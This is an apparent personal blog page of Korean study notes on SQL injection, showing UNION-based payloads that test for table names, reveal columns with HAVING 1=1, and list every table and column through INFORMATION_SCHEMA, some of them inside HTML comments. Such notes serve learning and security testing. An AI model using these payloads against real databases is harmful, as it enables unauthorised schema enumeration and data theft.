<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<style type="text/css">

.mw-highlight-console {
	background : #000;
	color : #fff;
}
.mw-highlight {
	border-left: .5em solid #59b;
	border-radius: .4em;
}
.mw-highlight pre {
	padding: .4em .6em;
	line-height: 1.2;
	font-size: 1.1em;
	margin : .2em 0;
}
pre {
	font-family: "NanumGothicCoding", Consolas, monospace !important;
	overflow: visible;
	white-space : pre-wrap;
/*
	border: solid 1px blue;
	font-size: 1.3 em;
	color : blue;
	margin: 10px;
	padding: 10px;
	background: #FFFFB3
	*/
}

code {
	font-size : 1.2em;
	color : #0008099
}

footer {
	width: 100%;
	height : 50px;
	background-color: #f9f8ee;
}
</style>
<title>jwmoon blog</title>
</head>
<body>
	<header>
		<h1><a href="#">jwmoon header</a></h1>
	</header>
	<nav>
		<ul>
			<li><a href="#">웹 취약점(3)</a></li>
			<li><a href="#">클로저 (4)</a></li>
		</ul>
	</nav>
	<section>
	<h1>유추를 통해 비밀정보 알아내기</h1>
	<p>
	1. 테이블명 유추 <br/>
	기본 패턴: 'union select * from [확인하고자 할 테이블명] --<br/>
	DB가 Oracle이냐 MySQL이냐에 따라서 뒤의 주석구문등을 변경해서 사용가능하다.<br/>
	존재하지 않는 테이블일 경우 다음과 같은 결과가 출력된다.<br/>  
	<img src="phase1.PNG" /> <br/>
	
	존재하는 테이블일 경우 다음과 같이 출력. <br/>
	<img src="phase1-2.PNG" />
	</p>
	
	<p>
	2. 칼럼명 유추 <br/>
	기본 패턴 : ' union select * from member a having 1=1 # <br/>
	응용 패턴 : ') union select a.*,0 from member a having 1=1 #
	
	</p>
	<!-- 
	') union select a.*,0 from member a having 1=1 #
	 -->
	 <!-- 전체 테이블 리스트 뽑아오는 공격문자열  
	 ') union SELECT 1000, table_Schema, table_name, sysdate(), 0, 'Y' FROM INFORMATION_SCHEMA.TABLES #
	 
	 -->
	 <div class="mw-highlight mw-highlight-console">
	 <pre>
	 ') union SELECT 1000, table_Schema, table_name, sysdate(), 0, 'Y' FROM INFORMATION_SCHEMA.TABLES #
	 </pre>
	 </div>
	 <!-- 전체 테이블 칼럼 리스트 뽑아오는 공격문자열  
	 ') union select 1000, TABLE_NAME, COLUMN_NAME, sysdate(), 0, 'Y' from INFORMATION_SCHEMA.COLUMNS  #
	 
	 -->
	 </section>
	 <footer>Copyright © 2016 All Rights</footer>
</body>
</html>